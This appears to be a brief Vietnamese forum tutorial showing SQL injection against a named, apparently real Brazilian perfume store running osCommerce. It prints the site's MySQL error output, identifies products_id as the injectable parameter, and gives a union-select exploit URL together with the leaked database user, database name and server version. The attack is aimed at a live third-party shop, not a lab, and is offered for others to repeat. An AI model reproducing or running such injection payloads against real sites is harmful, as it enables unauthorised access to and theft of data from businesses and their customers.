http://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375'.html
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limi' at line 1select p.products_id, p.products_quantity, p.products_image, pd.products_name, p.products_price from all_products p left join all_products_description pd on pd.products_id = p.products_id and pd.language_id = '4' left join all_manufacturers m using(manufacturers_id) left join all_products_to_categories pc on pc.products_id = p.products_id where pc.categories_id = '6' and m.sthefani_manufacturers_status = '1' and p.manufacturers_id = '157' and p.products_id not in (3375\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limit 4
[TEP STOP]
Nhiều bạn nghĩ đây là site .html thì chiến thế nào
Đơn giản cái đuôi .html chỉ là Rewrite URL dùng htaccess
Về bản chất cái site này là php vs mysql
Và với kinh nghiệm bản thân thì m biết cái source của site này là oscommerce
Và cái id bị lôi là products_id (nhìn ở p.products_id not in (3375\'))
Và Khai thác như bình thường thôi
Link exploit cho các bạn :
hxxp://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375) and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5-- -.html
lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community
Mình làm tới đây thôiPro đi qua nhìn thấy thì Thanks e 1 cái nhé ^^
End tut